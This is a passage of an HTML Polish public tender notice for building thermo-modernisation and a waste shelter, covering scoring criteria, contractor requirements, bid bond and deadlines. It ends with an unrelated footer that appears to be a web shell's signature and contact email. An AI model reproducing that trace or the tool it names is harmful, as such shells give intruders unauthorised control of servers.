prawne), usunięcie przeszkód formalno-prawnych, dochowanie przepisów prawa, wymogi organów lub podmiotów trzecich, zwiększenie bezpieczeństwa lub komfortu użytkowania obiektu.<br/> <br/> - szacunkową wartość tego zamówienia bez VAT: 315 450,81 zł.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Część 1 - Termomodernizacja i modernizacja	<br/><br/>Kryterium I - cena (C) - waga 60%<br/><br/>C = (cena najniższa spośród wszystkich ofert/cena badanej oferty) x 100 punktów x 60%<br/><br/>Kryterium II – wydłużenie okresu gwarancji i rękojmi za wady za każdy następny rok – waga 40 %<br/><br/>Zamawiający przyzna wykonawcy 1 punkt za każdy zadeklarowany w formularzu oferty dodatkowy rok gwarancji i rękojmi za wady powyżej wymaganego minimalnego okresu w wymiarze 5 lat, lecz nie więcej niż 2 dodatkowe lata ponad pięć wymaganych (maksymalnie 2 punkty); w przypadku braku wpisania w formularzu oferty dodatkowego(ych) roku (lat) gwarancji i rękojmi za wady, Zamawiający przyzna w tym kryterium „0” punktów; w przypadku wskazania dłuższego dodatkowego okresu gwarancji i rękojmi za wady niż 2 lata, Zamawiający przyzna maksymalnie 2 punkty w tym kryterium.<br/>– o rok ponad min. 5 lat (łącznie 6 lat) – 1 pkt <br/>– o dwa lata ponad min. 5 lat (łącznie 7 lat) – 2 pkt <br/><br/>G = (ilość punktów badanej oferty za dodatkowe lata okresu gwarancji i rękojmi za wady / największa ilość punktów za dodatkowe lata gwarancji i rękojmi za wady, tj. 2) x 100 punktów x 40%<br/><br/>Łączna ocena punktowa będzie stanowić sumę uzyskanych przez wykonawcę punktów we wszystkich kryteriach = (C) + (G)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> II.	CZĘŚĆ 2 - Dostawa i montaż wiaty śmietnikowej:<br/>•	dostawa i montaż wiaty śmietnikowej o wymiarach min. 4,0 x 3,0 m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Część 2 – Dostawa i montaż wiaty śmietnikowej	<br/><br/>Kryterium I - cena (C) - waga 60%<br/><br/>C = (cena najniższa spośród wszystkich ofert/cena badanej oferty) x 100 punktów x 60%<br/><br/>Kryterium II – skrócenie terminu realizacji (T)<br/><br/>– skrócenie o 1 dzień – 1 pkt <br/>– skrócenie o 2 dni – 2 pkt<br/><br/>T = (ilość punktów przyznana wg opisu punktacji j.w. / maksymalna możliwa ilość punktów<br/>za czas dostawy tj. 2) x 100 punktów x 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> . Zdolność techniczna lub zawodowa:<br/><br/> 3.4.1. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności krótszy w tym okresie wykonał: <br/><br/>Część 1 - Termomodernizacja i modernizacja <br/><br/>- wykonanie co najmniej jednej roboty budowlanej polegającej na budowie lub przebudowie lub remoncie lub termomodernizacji lub modernizacji budynku lub jego części o wartości robót nie mniejszej niż 1 000 000,00 zł brutto,<br/><br/>Część 2 – Dostawa i montaż wiaty śmietnikowej	<br/><br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/><br/> 3.4.2 dysponuje lub będzie dysponował:<br/><br/>Część 1 - Termomodernizacja i modernizacja	<br/><br/> - co najmniej 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, <br/><br/>- co najmniej 1 osoba posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/><br/>- co najmniej 1 osoba posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/><br/>lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa. Zamawiający dopuszcza łączenie funkcji zgodnie z obowiązującymi przepisami prawa.<br/><br/>Część 2 – Dostawa i montaż wiaty śmietnikowej<br/><br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. Wykaz podmiotowych środków dowodowych<br/><br/>4.1. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia w terminie nie krótszym niż 5 dni następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>- oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt 3.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- w celu wykazania spełniania warunku z ust. 3.4.1<br/><br/>wykaz robót budowlanych:<br/><br/>Część 1 - Termomodernizacja i modernizacja <br/><br/>- wykonanie co najmniej jednej roboty budowlanej polegającej na budowie lub przebudowie lub remoncie lub termomodernizacji lub modernizacji budynku lub jego części o wartości robót nie mniejszej niż 1 000 000,00 zł brutto,<br/><br/>wykonanej nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których robota ta została wykonana, oraz załączeniem dowodów określających, czy robota budowlana została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert<br/><br/>Część 2 – Dostawa i montaż wiaty śmietnikowej <br/><br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/><br/><br/>- w celu wykazania spełniania warunku z ust. 3.4.2.<br/><br/>wykaz osób:<br/><br/>Część 1 - Termomodernizacja i modernizacja	<br/> - co najmniej 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, <br/><br/>- co najmniej 1 osoba posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/><br/>- co najmniej 1 osoba posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/><br/>lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa. Zamawiający dopuszcza łączenie funkcji zgodnie z obowiązującymi przepisami prawa,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami.<br/><br/>Część 2 – Dostawa i montaż wiaty śmietnikowej<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>1)złożenie dokumentu pełnomocnictwa dla osoby zawierającej umowę w imieniu Wykonawcy, o<br/>ile upoważnienie do reprezentowania Wykonawcy nie wynika z dokumentów rejestrowych<br/>Wykonawcy, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, lub dokument pełnomocnictwa nie został wcześniej złożony w trakcie postępowania<br/>o udzielenie zamówienia,<br/>2) w przypadku dokonania wyboru najkorzystniejszej oferty złożonej przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, złożenia umowy regulującej współpracę<br/>tych podmiotów (np. umowa konsorcjum, umowa spółki cywilnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości: 47 000,00 (słownie: czterdzieści siedem tysięcy złotych 00/100) – dla części 1 przedmiotu zamówienia. <br/>2.	Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w niniejszym rozdziale SWZ.<br/>3.	Formy wnoszenia wadium: wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1.pieniądzu;<br/>2.gwarancjach bankowych;<br/>3.gwarancjach ubezpieczeniowych;<br/>4.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz.U. z 2020r. poz. 299).<br/>W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego prowadzony przez PKO Bank Polski SA: nr 05 1020 2313 0000 3402 0556 3525. <br/>Uwaga: Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert.<br/>4.	Wadium wnoszone w postaci niepieniężnej należy złożyć wraz z ofertą poprzez Platformę przetargową - w wydzielonym, odrębnym pliku. Należy przekazać oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5.	Zwrot wadium z urzędu:<br/>Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności wskazanych w art. 98 ust. 1 pkt 1-3 ustawy.6.	Zwrot wadium na wniosek Wykonawcy:<br/>Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium Wykonawcy:	<br/>1.	który wycofał ofertę przed upływem terminu składania ofert;<br/>2.	którego oferta została odrzucona;<br/>3.	po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4.	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Uwaga: Złożenie wniosku o zwrot wadium, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w ustawie oraz rozdziale 22 SWZ.<br/>7.	Zatrzymanie wadium.<br/>Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie innej niż w pieniądzu, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>7.1.	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 ustawy, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.7.2.	Wykonawca, którego oferta została wybrana:1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<br/>2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>7.3.	Zawarcie umowy w sprawie niniejszego zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.Szczegółowe informacje zawarte są w rozdziale 18 swz <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z<br/>ofertą stosowne pełnomocnictwo – zgodnie z ust. 3.3. rozdz. 12 SWZ – nie dotyczy spółki<br/>cywilnej o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga nr 1: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod<br/>taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego<br/>pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców<br/>oświadczenie, o którym mowa w art. 125 ustawy (ust. 3.1. rozdziału 12 SWZ) składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu,<br/>oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ<br/>podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do<br/>danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się<br/>oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające<br/>ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako<br/>pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 15. ZMIANY UMOWY<br/>1. Zamawiający na mocy art. 455 ust. 1 pkt. 1 u.p.z.p. dopuszcza istotne zmiany postanowień zawartej Umowy w stosunku do treści oferty, złożonej w przedmiotowym postępowaniu bez przeprowadzania nowego postępowania o udzielenie zamówienia. Zamawiający dopuszcza także zmianę Umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia w przypadkach opisanych w treści art. 455 ust. 1 pkt. 2, 3 i 4 oraz ust. 2, 3 i 4 u.p.z.p.<br/>Wszystkie Zmiany są opisane w paragrafie 15 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/promoter/tender/15813/summary</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com